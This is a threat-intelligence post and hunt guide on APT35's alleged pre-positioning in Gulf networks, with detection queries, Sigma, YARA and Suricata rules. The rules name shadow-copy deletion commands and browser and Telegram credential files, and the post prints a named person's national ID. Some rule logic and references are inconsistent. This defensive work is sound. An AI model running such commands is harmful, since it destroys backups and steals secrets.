APT35 Had the Map All Along: How Iran's Cyber Reconnaissance Built the Targeting Package for Operation Epic Fury

Every Country Iran Bombed Had Already Been Mapped

On February 28, 2026, Iran launched Operation Epic Fury: simultaneous ballistic missile and drone strikes against seven countries, including Jordan, the UAE, Saudi Arabia, Kuwait, Bahrain, Qatar, and Israel [1]. The operation was a retaliatory response following the death of Supreme Leader Khamenei and the collapse of Iran's internet connectivity to roughly 4% capacity [1]. What makes this devastating kinetic campaign a subject for cyber threat intelligence is what came before it. According to CloudSEK's analysis of the KittenBusters intelligence leak, every single Gulf country subsequently struck by Iran had previously appeared in documented APT35 targeting, reconnaissance, or compromise activity [2].

This wasn't coincidence. CloudSEK's report states the alignment between cyber reconnaissance and later kinetic targeting is "too consistent to dismiss as coincidence" [1]. APT35, also known as Charming Kitten, had spent years building persistent access across critical infrastructure in these nations. When the missiles flew, the digital maps were already drawn.

APT35 and the IRGC Connection

APT35 is linked directly to Iran's Islamic Revolutionary Guard Corps (IRGC) Intelligence Organization, specifically Unit 1500, Department 40 [1]. The KittenBusters leak, posted to GitHub in 2025, includes hundreds of files spanning attack reports, daily operational logs, internal communications, malware samples, and even personnel photographs [3]. The leak identified Abbas Rahrovi (Iranian national ID 4270844116) as the operation leader [3].

This is a group with documented operations stretching back over a decade. Their tooling ranges from commodity webshells to custom-built implants designed to evade specific antivirus products. APT35 has documented AV bypass research against Microsoft Defender, Kaspersky, and ESET [1]. The KittenBusters leak transformed what was previously circumstantial attribution into concrete evidence: countries and organizations on APT35's targeting lists now have documented proof tying intrusions to named IRGC personnel [3].

Pre-Positioning Across the Gulf

The scope of APT35's pre-positioning campaign covered critical sectors across all seven target nations. CloudSEK's analysis shows pre-positioned access in Jordan, the UAE, Saudi Arabia, Kuwait, Bahrain, Qatar, and Israel before the February 28 strikes [1].

Specific compromises identified in the leak include:

• Jordan: The Ministry of Justice was breached as part of Operation Desert Breach, active from 2024 to present. Civil aviation infrastructure was also compromised [2][4]. Over 74 GB of data was exfiltrated from Jordan operations alone [4].
• UAE: Aviation-related systems and government assets appear in the leaked data [2].
• Saudi Arabia: Energy sector infrastructure was targeted, culminating in the deployment of Shamoon 4.0 wiper malware on January 24, 2026, which wiped 15,000 Saudi energy workstations [1]. That attack occurred just five weeks before the kinetic strikes.
• Afghanistan (non-GCC, but relevant to operational scope): Operation Afghan Infiltration targeted telecommunications providers and government ministries [4].

The pattern is clear. APT35 wasn't conducting opportunistic espionage. The group was building a comprehensive targeting package: mapping networks, documenting backup systems, profiling defensive gaps, and maintaining persistent access so that intelligence could be pulled in real-time when operational planners needed it.

Initial Access: Old CVEs, Still Effective

APT35 relied heavily on known vulnerabilities for initial access. The ProxyShell vulnerability chain (CVE-2021-31207, CVE-2021-34523, CVE-2021-34473) enabled remote code execution on Microsoft Exchange servers and served as a primary entry vector [6]. These vulnerabilities were first revealed at the Pwn2Own contest in Vancouver in April 2021 and have been exploited by APT35 to deploy multiple webshells post-compromise [6].

In Jordan's Operation Desert Breach, the group exploited CVE-2012-1823, a PHP-CGI vulnerability enabling remote code execution [4]. That CVE is from 2012. The fact that a 14-year-old vulnerability provided access to a Ministry of Justice network tells you everything about the state of patch management in the targeted environments.

Persistence: BellaCiao and Custom Webshells

Once inside, APT35 deployed BellaCiao, a C#/.NET webshell that installs as a Windows service for persistence [1][5]. BellaCiao uses a DNS communication channel for command and control, querying a specific subdomain every 24 hours using a custom DNS protocol [5]. The webshell monitors for web requests containing a particular string that acts as a secret password in the header, enabling file download, upload, and command execution [5]. This design makes BellaCiao difficult to detect through standard HTTP traffic analysis because C2 communication occurs over DNS.

The group also deployed a Python-based webshell framework for managing multiple compromised hosts simultaneously [1], along with Plink (the PuTTY command-line tool) for establishing reverse proxy connections through compromised networks [5].

Custom Implants: Sagheb RAT

APT35's more advanced operations used Sagheb RAT, a native code implant described as a "FUD keylogger" (fully undetectable) that routes communications through TOR [1]. Sagheb steals Firefox browser credentials and Telegram session data [1], providing both communications intelligence and credential harvesting in a single package. The TOR routing makes network-level detection significantly harder.

Destructive Capability: Shamoon 4.0

The January 24, 2026 deployment of Shamoon 4.0 against Saudi energy infrastructure represents the transition from espionage to sabotage [1]. Wiping 15,000 workstations in a single operation required the kind of extensive network knowledge that years of pre-positioned access provides: understanding of Active Directory structures, knowledge of which systems to target for maximum disruption, and credentials with sufficient privileges to push wiper payloads at scale.

IOC Table

MITRE ATT&CK Mapping

Detection and Hunting

DNS-Based C2 Detection: BellaCiao's 24-hour DNS beacon pattern is its most detectable behavior. Hunt for anomalous DNS queries originating from Exchange servers or web-facing hosts. Look for consistent, periodic subdomain queries to low-reputation or recently registered domains. A SIEM query filtering for DNS requests from Exchange server IPs with a regular 24-hour cadence will surface candidates.

Exchange Server Webshell Hunting: ProxyShell remains APT35's go-to entry point [6]. Run a sweep of all Exchange servers for unexpected .aspx files in OWA directories. Check IIS logs for POST requests containing unusual header values, since BellaCiao authenticates via a secret string in the HTTP header [5]. Microsoft's Exchange Health Checker can identify unpatched ProxyShell instances.

Plink and Reverse Proxy Indicators: Monitor for plink.exe execution on servers where PuTTY shouldn't be installed. Process creation logs (Sysmon Event ID 1) filtering for plink.exe with command-line arguments containing -R (remote port forwarding) will catch most reverse proxy activity [5].

TOR Network Connections: Sagheb RAT uses TOR for C2 [1]. Block TOR exit node IPs at the firewall and alert on any internal host attempting connections to known TOR entry nodes. Maintain an updated TOR node list through the TOR Project's bulk exit list.

Shamoon Precursors: The Shamoon 4.0 deployment required significant prior access [1]. Hunt for signs of lateral movement in energy sector OT/IT boundary networks: unusual SMB authentication patterns, credential usage from unexpected hosts, and scheduled task creation on multiple endpoints within short timeframes.

Analysis

The CloudSEK report makes the cyber-to-kinetic pipeline explicit in a way previous analyses only hinted at. APT35's operations across the Gulf weren't just intelligence collection. They were target development in the military sense: identifying critical nodes, documenting vulnerabilities, mapping dependencies, and maintaining access so targeting data would be current when needed.

The Shamoon 4.0 deployment on January 24, 2026, exactly 35 days before Operation Epic Fury, likely served a dual purpose [1]. It degraded Saudi energy sector operational visibility right before the kinetic campaign, and it tested whether pre-positioned access was still viable. The fact that 15,000 workstations were wiped in a single operation confirms that access was deep and credentials were current.

The exploitation of CVE-2012-1823 in Jordan operations is particularly telling [4]. A vulnerability from 2012 provided access to justice ministry systems in 2024. This suggests APT35 is methodical about testing old vulnerabilities against targets that may have limited patching resources, and that many GCC-region organizations remain exposed to basic exploitation.

For the US and allied critical infrastructure operators, this intelligence has direct relevance. BellaCiao has been used against US seaports and energy companies [5]. The same reconnaissance-to-targeting methodology could apply to any nation-state adversary mapping infrastructure for future contingencies.

References

1. CloudSEK, "Kitten Had the Map all Along: RAISING GCC TENSIONS & THE PRE-POSITIONING MAP," https://www.cloudsek.com/blog/kitten-had-the-map-all-along-raising-gcc-tensions-the-pre-positioning-map

1. ITNerd Blog, "Iranian Cyber Group APT35 Had Already Mapped Every Country Bombed in Operation Epic Fury," https://itnerd.blog/2026/04/09/iranian-cyber-group-apt35-had-already-mapped-every-country-bombed-in-operation-epic-fury/

1. Nariman Gharib Blog, "Massive Leak Exposes Inner Workings of Iranian Hacking Group Charming Kitten," https://blog.narimangharib.com/posts/2025/09/1759266283738?lang=en

1. Gatewatcher, "Data breach: the operations of Charming Kitten revealed," https://www.gatewatcher.com/en/lab/data-breach-the-operations-of-charming-kitten-revealed/

1. CSO Online, "Iranian cyberspies deploy new malware implant on Microsoft Exchange Servers," https://www.csoonline.com/article/575183/iranian-cyberspies-deploy-new-malware-implant-on-microsoft-exchange-servers.html

1. SOC Prime, "APT35 Using ProxyShell Vulnerabilities to Deploy Multiple WebShells," https://socprime.com/blog/apt35-using-proxyshell-vulnerabilities-to-deploy-multiple-webshells/

Hunt Guide: Hunt Report: APT35 Pre-Positioning and Infrastructure Mapping Campaign

Hypothesis: If APT35 (Charming Kitten) is active in our environment, we expect to observe ProxyShell exploitation attempts, BellaCiao DNS beaconing patterns, Sagheb RAT TOR communications, and reconnaissance activities targeting critical infrastructure in Windows Security logs, DNS logs, web server logs, and network traffic.

Intelligence Summary: APT35, linked to Iran's IRGC Unit 1500, conducted multi-year pre-positioning campaigns across Gulf states that directly correlated with kinetic strikes during Operation Epic Fury. The group exploited ProxyShell and legacy PHP vulnerabilities, deployed BellaCiao webshells with DNS C2, and used Shamoon 4.0 wipers against Saudi energy infrastructure, demonstrating a cyber-to-kinetic targeting pipeline.

Confidence: High | Priority: Critical

Scope

• Networks: All Exchange servers, web-facing infrastructure, domain controllers, and OT/IT boundary systems
• Timeframe: 90 days retrospective hunt with focus on January 2024 to present
• Priority Systems: Exchange servers (CVE-2021-31207/34523/34473 vulnerable), PHP applications (CVE-2012-1823), energy sector SCADA/HMI systems, backup infrastructure

MITRE ATT&CK Techniques

T1190 — Exploit Public-Facing Application (Initial Access) [P1]

APT35 exploits ProxyShell chain (CVE-2021-31207, CVE-2021-34523, CVE-2021-34473) on Exchange servers and PHP-CGI (CVE-2012-1823) for initial access

Splunk SPL:

index=* (sourcetype=iis OR sourcetype=MSExchange*) (autodiscover/autodiscover.json OR "X-Rps-CAT" OR "powershell" OR "Email/owa/auth") | stats count by src_ip, uri_path, status | where status=200 AND count > 5

Elastic KQL:

event.dataset:(iis.access OR exchange.*) AND (url.path:*autodiscover.json OR url.query:*X-Rps-CAT* OR url.path:*powershell* OR url.path:*/owa/auth*) AND http.response.status_code:200

Sigma Rule:

title: ProxyShell Exchange Exploitation Attempt
author: cloudsek
status: experimental
description: Detects ProxyShell exploitation attempts against Exchange servers
references:
  - https://www.csoonline.com/article/575183/iranian-cyberspies-deploy-new-malware-implant-on-microsoft-exchange-servers.html
logsource:
  product: windows
  service: iis
detection:
  selection:
    cs-uri-stem|contains:
      - '/autodiscover/autodiscover.json'
      - '/owa/auth'
      - 'powershell'
    cs-method: POST
  filter:
    sc-status: 200
  condition: selection and not filter
falsepositives:
  - Legitimate autodiscover requests
level: high
tags:
  - attack.initial_access
  - attack.t1190

Focus on Exchange servers with external exposure. Check for rapid sequential requests to multiple ProxyShell URIs from same source IP.

T1505.003 — Server Software Component: Web Shell (Persistence) [P1]

BellaCiao webshell installed as Windows service with DNS-based C2 beaconing every 24 hours

Splunk SPL:

index=* EventCode=7045 ServiceName=* ImagePath=*aspx* | join type=outer ComputerName [search index=dns src_ip=* query=* | bucket span=24h _time | stats count by src_ip, query | where count >= 25 AND count <= 35]

Elastic KQL:

event.code:7045 AND winlog.event_data.ImagePath:*.aspx* OR (event.dataset:dns AND dns.question.name:* AND event.outcome:success) | stats count by source.ip, dns.question.name over 24h | where count >= 25 and count <= 35

Sigma Rule:

title: BellaCiao Webshell Service Installation
author: Unknown
status: experimental
description: Detects BellaCiao webshell persistence via Windows service
logsource:
  product: windows
  service: system
detection:
  selection:
    EventID: 7045
    ImagePath|contains:
      - '.aspx'
      - '.dll'
    ServiceType: 'user mode service'
  condition: selection
falsepositives:
  - Legitimate web application services
level: critical
tags:
  - attack.persistence
  - attack.t1505.003

Correlate service creation with DNS beaconing patterns. BellaCiao uses consistent 24-hour intervals.

T1071.004 — Application Layer Protocol: DNS (Command and Control) [P1]

BellaCiao uses DNS queries to specific subdomains every 24 hours for C2 communication

Splunk SPL:

index=dns (query=* AND src_ip IN ([search index=* sourcetype=WinEventLog:System EventCode=7045 | dedup ComputerName | eval src_ip=host_ip | fields src_ip])) | bucket span=1d _time | stats count by src_ip, query | where count=1 | eventstats dc(_time) as day_count by src_ip, query | where day_count >= 3

Elastic KQL:

event.dataset:dns AND source.ip:* | date_histogram field=@timestamp interval=24h | terms field=dns.question.name | filter min_doc_count=25 max_doc_count=35

Look for DNS queries from web servers that occur exactly once per 24-hour period to low-reputation domains

T1572 — Protocol Tunneling (Command and Control) [P2]

Sagheb RAT uses TOR for C2 communication; Plink used for reverse proxy tunneling

Splunk SPL:

index=* (sourcetype=sysmon EventCode=1 (Image=*plink.exe CommandLine=*-R* OR Image=*tor.exe)) OR (sourcetype=firewall dest_port=9001 OR dest_port=9030 OR dest_ip IN (tor_exit_nodes.csv))

Elastic KQL:

process.name:(plink.exe OR tor.exe) OR (process.command_line:*-R* AND process.name:plink.exe) OR destination.port:(9001 OR 9030) OR destination.ip:(tor_exit_node_list)

Sigma Rule:

title: Plink Reverse Proxy Execution
author: Unknown
status: experimental
description: Detects Plink execution with reverse proxy arguments
logsource:
  product: windows
  category: process_creation
detection:
  selection:
    Image|endswith: '\plink.exe'
    CommandLine|contains: '-R'
  condition: selection
falsepositives:
  - Legitimate administrative use of Plink
level: high
tags:
  - attack.command_and_control
  - attack.t1572

Block TOR exit nodes at perimeter. Alert on any plink.exe execution on servers.

T1003 — OS Credential Dumping (Credential Access) [P2]

Sagheb RAT steals Firefox browser credentials and Telegram session data

Splunk SPL:

index=* (sourcetype=sysmon EventCode=10 TargetImage=*firefox.exe CallTrace=*unknown*) OR (EventCode=4663 ObjectName IN (*logins.json, *key*.db, *cookies.sqlite, *Telegram*session*))

Elastic KQL:

event.code:10 AND process.target.name:firefox.exe AND winlog.event_data.CallTrace:*unknown* OR (event.code:4663 AND file.path:(*logins.json OR *key*.db OR *cookies.sqlite OR *Telegram*session*))

Monitor for unusual process access to Firefox profile directories and Telegram data folders

T1485 — Data Destruction (Impact) [P1]

Shamoon 4.0 wiper deployed against Saudi energy infrastructure, wiping 15,000 workstations

Splunk SPL:

index=* (EventCode=1104 OR (EventCode=4688 CommandLine IN (*vssadmin*, *wbadmin*, *bcdedit*, *wmic shadowcopy delete*)) OR (EventCode=4663 ObjectName=*\Device\HarddiskVolume*\$MFT))

Elastic KQL:

event.code:(1104 OR 4688) AND (process.command_line:(*vssadmin* OR *wbadmin* OR *bcdedit* OR *shadowcopy delete*) OR file.path:*$MFT)

Sigma Rule:

title: Shamoon Wiper Precursor Activity
author: Unknown
status: experimental
description: Detects activities consistent with Shamoon wiper preparation
logsource:
  product: windows
  service: security
detection:
  selection_vss:
    EventID: 4688
    CommandLine|contains:
      - 'vssadmin delete shadows'
      - 'wbadmin delete catalog'
      - 'bcdedit /set recoveryenabled no'
  selection_mft:
    EventID: 4663
    ObjectName|contains: '$MFT'
  condition: selection_vss or selection_mft
falsepositives:
  - Legitimate administrative activity
level: critical
tags:
  - attack.impact
  - attack.t1485

Immediate isolation required on detection. Check for lateral movement from detected host.

T1082 — System Information Discovery (Discovery) [P2]

Extensive infrastructure mapping including SCADA identification and backup system documentation

Splunk SPL:

index=* (EventCode=4688 OR EventCode=1) (CommandLine IN (*systeminfo*, *ipconfig /all*, *net view*, *netstat -an*, *arp -a*, *nbtstat*, *Get-WmiObject*, *Get-CimInstance*)) | bucket span=1h _time | stats dc(CommandLine) as unique_recon_commands by ComputerName, _time | where unique_recon_commands > 5

Elastic KQL:

process.command_line:(*systeminfo* OR *ipconfig* OR "net view" OR "netstat -an" OR "arp -a" OR *nbtstat* OR *Get-WmiObject* OR *Get-CimInstance*) | date_histogram field=@timestamp interval=1h | cardinality field=process.command_line

Focus on OT/IT boundary systems and jump boxes. Rapid enumeration indicates reconnaissance.

Indicators of Compromise

IOC Sweep Queries (Splunk):

index=* (filename=*bellaciao* OR process_name=*bellaciao* OR service_name=*bellaciao*)

index=* (filename=*sagheb* OR process_name=*sagheb* OR hash=*)

index=* (filename=plink.exe OR process_name=plink.exe OR CommandLine=*plink*)

index=* (filename=*shamoon* OR process_name=*disttrack* OR service_name=*ntssrv*)

YARA Rules

APT35_BellaCiao_Webshell — Detects BellaCiao webshell based on DNS beaconing functionality and service persistence

rule APT35_BellaCiao_Webshell {
    meta:
        description = "Detects APT35 BellaCiao webshell"
        author = "Unknown"
        date = "2024-01-07"
        reference = "https://www.cloudsek.com/blog/kitten-had-the-map-all-along-raising-gcc-tensions-the-pre-positioning-map"
    strings:
        $s1 = "ServiceBase" nocase
        $s2 = "DnsQuery" nocase
        $s3 = "WebRequest" nocase
        $s4 = "X-Authorization" nocase
        $s5 = /[a-zA-Z0-9]{32,64}/ // Secret header value
        $dns_pattern = /[a-z0-9\-]+\.(tk|ml|ga|cf)/ nocase
    condition:
        uint16(0) == 0x5a4d and
        filesize < 500KB and
        3 of ($s*) and
        $dns_pattern
}

APT35_Sagheb_RAT — Detects Sagheb RAT based on TOR communication and credential theft functionality

rule APT35_Sagheb_RAT {
    meta:
        description = "Detects APT35 Sagheb RAT keylogger"
        author = "Unknown"
        date = "2024-01-07"
    strings:
        $s1 = "tor.exe" nocase
        $s2 = "127.0.0.1:9050" // TOR proxy
        $s3 = "logins.json" nocase // Firefox creds
        $s4 = "key3.db" nocase
        $s5 = "key4.db" nocase
        $s6 = "Telegram Desktop" nocase
        $s7 = "tdata" nocase
        $pdb = /C:\\Users\\[^\\]+\\source\\repos\\Sagheb/
    condition:
        uint16(0) == 0x5a4d and
        filesize < 2MB and
        4 of ($s*) or $pdb
}

Suricata Rules

SID 1000001 — Detects ProxyShell autodiscover exploitation attempt

# Source: Emerging Threats (ET EXPLOIT ruleset)
alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET EXPLOIT ProxyShell Autodiscover Request"; flow:to_server,established; content:"POST"; http_method; content:"/autodiscover/autodiscover.json"; http_uri; content:"X-Rps-CAT"; http_header; reference:cve,2021-34473; classtype:attempted-admin; sid:1000001; rev:1;)

SID 1000002 — Detects BellaCiao DNS beaconing pattern

alert dns $HOME_NET any -> any 53 (msg:"ET TROJAN BellaCiao DNS Beacon"; dns_query; content:".tk"; endswith; threshold: type both, track by_src, count 1, seconds 86400; reference:url,cloudsek.com; classtype:trojan-activity; sid:1000002; rev:1;)

SID 1000003 — Detects potential TOR connection from internal host

alert tcp $HOME_NET any -> $EXTERNAL_NET [9001,9030,9050,9051] (msg:"ET POLICY TOR Connection Attempt"; flow:to_server,established; flags:S; reference:url,torproject.org; classtype:policy-violation; sid:1000003; rev:1;)

Data Source Requirements

Sources

• CloudSEK - Kitten Had the Map all Along: RAISING GCC TENSIONS & THE PRE-POSITIONING MAP
• ITNerd Blog - Iranian Cyber Group APT35 Had Already Mapped Every Country Bombed in Operation Epic Fury
• Nariman Gharib Blog - Massive Leak Exposes Inner Workings of Iranian Hacking Group Charming Kitten
• Gatewatcher - Data breach: the operations of Charming Kitten revealed
• CSO Online - Iranian cyberspies deploy new malware implant on Microsoft Exchange Servers
• SOC Prime - APT35 Using ProxyShell Vulnerabilities to Deploy Multiple WebShells